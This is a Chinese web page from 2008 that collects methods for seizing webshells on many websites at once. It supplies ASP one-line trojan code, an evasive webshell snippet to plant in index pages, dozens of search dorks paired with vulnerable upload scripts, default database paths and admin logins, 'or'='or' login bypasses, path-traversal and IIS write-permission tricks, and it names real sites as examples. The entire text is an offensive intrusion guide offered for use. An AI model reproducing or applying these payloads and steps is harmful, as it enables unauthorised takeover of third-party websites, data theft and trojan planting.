拿WEBSHELL方法大全

http://www.xishuiw.com 2008年06月11日18:41 浠水网

###################################################################      
#####################      菜鸟批量拿 网站WEBSHELL    ##########################
###################################################################
############################      BY          ##########################
###################################################################

shell提示不能更改目录时候可以通过上传的方法然后替换他的目录文件达到替换的目的

弹出很快的提示就是SCRIPT代码 可以通过修改代码本地提交。。登录页面也一样。。。。


###################################################################

一句话木马    :

《%If request("a") ="m" then eval request("am") end if %》


一句话图片木马 可以直接用客户端链接图片网址上传大马。


###################################################################
免查杀的webshell

代码插入任意ASP中INDEX 最佳

《object id=fs RUNAT=SERVER    classid='clsid:0D43FE01-F093-11CF-8940-00A0C9054228'》《/object》《%if request("xb")《》"" then Session("b")=request("xb")
if Session("b")《》"" then execute Session("b")%》
控制端http://tx.qzinfo.cn/cs.asp    用于上传木马 (一句话也可以实现)


###################################################################

eWebeditor

默认数据库 db/ewebediter.mdb

###################################################################


网站猎手2.0
关键字:inurl:Went.asp
插入后缀:manage/login.asp
密码:'or'='or'
###################################################################
先用挖掘机
搜索: 格式13117101402
后缀是 upfile_other.asp  

###################################################################
关键词: 飞越公司企业网站管理系统
后辍:    databases\21asp.mdb
后台: admin/Login.asp
默认密码: admin-admin
###################################################################
关键词:    用户登陆 产品查询 产品列表 在线调查 新闻资讯    企业新闻    业内资讯
后辍:    Databases/myszw.mdb
插入后缀: admin/login.asp
###################################################################
关键字:企业邮局企业荣誉营销网络产品分类信息反馈联系我们收藏本站
漏洞文件:/db/com02.mdb
默认后台地址:admin/login.asp
###################################################################
关键字:格式0791-6274752
              
            格式13075666897

            格式0377-66885652

            格式0791-8059439

            格式0791-6274752

            格式0310-5173992
漏洞文件:/upfile_other.asp,先注册个用户名,然后在使用上传工具上传木马

###################################################################

关键词: 资讯中心 软件分类 最近更新 推荐下载 用户注册 用户登陆
漏洞文件:upfile.asp
###################################################################

关键词:亲爱的顾客
漏洞文件:upfile_flash.asp

###################################################################
关键字:inurl:Msmir_DownLoad
传奇默认数据库:/msmir_net.mdb,/msmir/msmir.mdb
关键词:Msmir_Services    Msmir_DownLoads Msmir_Experience Msmir_GameFAQ Msmir_GameRoles Msmir_News    Msmir_img

###################################################################

文件名是/manage/login.asp
关键词是    went.asp 用    "or"="or"来登陆  

###################################################################

关键字:Co Net MIB Ver 1.0网站后台管理系统  
帐号密码为      "or"="or"

###################################################################

后辍      /Database/#newasp.mdb
关键词:NewAsp SiteManageSystem Version

###################################################################
用挖掘机  
关键字:Powered by WEBBOY
后辍:/upfile.asp
###################################################################
关键字:powered by mypower
后辍:Upfile_Article.asp bbs/upfile.asp  
###################################################################
上传漏洞.    工具 : Domain3.5 网站猎手 1.5版
关键字        powered by mypower 检测的页面或文件
插入          upfile_photo.asp
###################################################################
新云漏洞 。
G关键字 关于本站 - 网站帮助 - 广告合作 - 下载声明 - 友情连接 - 网站地图 - 管理登录
把flash/downfile.asp?url=uploadfile/../../conn.asp提交到网站根目录。就可以下载conn.asp
大家时常碰到数据库如果前面或者中间加了# 可以用%23替换就可以下载了 \database\%23newasp.mdb
如:#xzws.mdb 改成%23xzws.mdb
###################################################################

通吃所有商城+动力上传系统  
使用工具:挖掘鸡 v1.1 明小子  
关键字:选购 加入购物车 去收银台 确认收货人信息 选付款方式 选配送方式 在线支付或下单后汇款 汇款确认 发货 完成
漏洞页面:upload.asp    upfile_flash.asp  

###################################################################

动力入侵: 关键字:powered by mypower
漏洞页面:upfile_photo.asp Upfile_Soft.asp upfile_adpic.asp upfile_softpic.asp  

###################################################################

入侵魔兽私服
工具:ASP木马一只。 Domain3.5明小子
关键字:All Right Reserved Design:游戏联盟
后台地址:admin/login.asp
数据库的地址:chngame/#chngame.mdb  


###################################################################

关键字:尚奈克斯
后台路径/system/manage.asp    直接传ASP木马

###################################################################

工具 1:网站猎手 2:大马一个
关键字:切勿关闭Cookies功能,否则您将不能登录
插入diy.asp

###################################################################

关键字:Team5 Studio All rights reserved
默认数据库:data/team.mdb

###################################################################

关键字:Powered by:QCDN_NEWS 随便扫遍文章加一个    '      ,来试探注入点
后台地址:admin_index.asp
###################################################################

入侵雷池新闻发布系统
关键字:leichinews
去掉leichinews后面的. 打上:admin/uploadPic.asp过滤了Type=mod&picName=xuanran.asp
再上传马..... 进访问uppic anran.asp 登陆马.  

###################################################################

关键字:Power System Of Article Management Ver 3.0 Build 20030628
默认数据库:database\yiuwekdsodksldfslwifds.mdb  
后台地址:自己扫描!

###################################################################

通过GOOGLE搜索找大量注入点
关键字:asp?id=1 gov.jp/ asp?id=
页数:100
语言:想入侵哪个国家就填什么语言吧  

###################################################################

关键字:Powered by:94KKBBS 2005
利用密码找回功能
找回admin 提问:ddddd 回答:ddddd

###################################################################

关键字:****** inurl:readnews.asp
把最后一个/改成%5c ,直接暴库,看密码,进后台 随便添加个新闻 在标题输入我们的一句话木马

###################################################################

关键字:程序核心:BJXSHOP网上开店专家  
后台:/admin

先用google搜索 inurl:flasher_list.asp,

随便选 一个吧http://****.***.com/flasher_list.asp

则默认数据库下载地址为http://****.***.com/database/flash.mdb

后台为http://****.***.com//manager/

搜索这个flasher_list.asp也可以用Momain3.5注入,因为这个本身就有注入漏洞

###################################################################

动易

先搜索关键字:Copyright 2003-2004 动易网络,
例如是http://bkpg.xmu.edu.cn/Admin_Login.asp则试试提交http://bkpg.xmu.edu.cn/upfile_soft.asp如出现:请登录后再使用本功能!

那么我们可以打开Domain了

-选项卡 综合上传=》动力上传漏洞=》.....

-填上有漏洞网站的UPFILE_SOFT页面 http://bkpg.xmu.edu.cn/upfile_soft.asp上传木马~~~~

manage

user/Upload.asp?dialogtype=UserBlogPic&size=5    图片插ASP或者一句话

###################################################################

动力文章管理系统漏洞

搜索关键字:Article Management Ver 3.0

如是http://www.nokia365.com/

则默认数据库下载地址为http://www.nokia365.com/database\yiuwekdsodksldfslwifds.mdb

后台http://www.nokia365.com/Admin_login.asp

#############################################################################
找网吧主机IP就是利用抓包工具→ → 查询余额 后面显示的就是主机IP
###################################################################

动易漏洞

搜Powered By Dvbbs Version 7.1.0

或Powered By :Dvbbs Version 7.0.0 Sp2

或Powered by:Dvbbs Version 6.0.0

则默认数据库下载地址为网站后加

bbs/data/dvbbs7.mdb

或ddata/dvbbs7.mdb

或bbs/data/dvbbs6.mdb

当然,你可以搜索Dvbbs Version 用其挖掘鸡或网站猎手,添加后缀,
/data/dvbbs7.mdb
/bbs/Data/dvbbs7.MDB,

OBlog漏洞

用网站猎手搜索:powered by OBlog ver2.22

添加后缀,data/oblog221.mdb

###################################################################

用挖掘机
关键字:Powered by WEBBOY
页面:/upfile.asp

###################################################################

1.打开百度或GOOGLE搜索,输入powered by comersus ASP shopping cartopen source。
这是一个商场系统。
2.网站的最底部分,有个 Comersus Open Technologies LC。打开看下~~comersus系统~
猜到,comersus.mdb. 是数据库名
数据库都是放在database/ 后的,
所以database/comersus.mdb
comersus_listCategoriesTree.asp换成database/comersus.mdb,不能下载。
那样把前一个''store/''除去,再加上database/comersus.mdb 试试

###################################################################

国外站的爆库漏洞
关键字:sad Raven's Guestbook
密码地址:/passwd.dat
后台地址:/admin.php


###################################################################

旁注一下 baidu搜索

随便写搜索内容+inurl:asp这个的不会很多但是1面应该也有个几个
inurl: (asp?=数字)
inurl: (php?=数字)
随便写搜索内容+ inurl:asp

在google里 输入 asp?id=      扫注入点    在啊D 或者名小子里

###################################################################

IIS写权限之批量拿站
baidu扫描站点 → →    ping ip → →    IISPutScanner扫描可利用主机    双击写入大/小马

→ → (文件格式TXT)    → →    iiswrite更改文件类型(move选项)→ → 传大马

###################################################################

在网站猎手里搜索:客服电话:移动电话:传真:客服信箱:客服QQ
插入:admin/upload.asp?fuptype=db&fupname=shopbackup&frmname=db

###################################################################

通过后台拿webshell的初级教程
①.在上传文件框处使用抓包工具找出上传地址...如 在POST处查看    /Flash/upload/shot_upfile.asp...
②.然后用名小子的上传漏洞工具上传大马会DIY.ASP 进一步提权 挂马

###################################################################

关键字:Powered By :SMT Version 5.0
后戳:/bbs/upfile.asp,/upfile_flash.asp

#####################################################################


关键字:Powered By Kesion Inc
默认数据库    ks_data/ks_database.mdb


###########################################################

啊D上面打开网页    google 找关键字 inurl:MtvID=?    注入


###########################################################


网页在线编辑器 → →    密码ADMIN 帐号ADMIN → →    添加上传类型 asa    → →    上传小马
→ → 预览得到地址→ → 上传大马→ → 入侵提权。。。。

发表评论
上一篇ASP.Net及Asp中的MD5加密-16位32位
下一篇SQL注入高级技巧nowthk篇
正在加载中……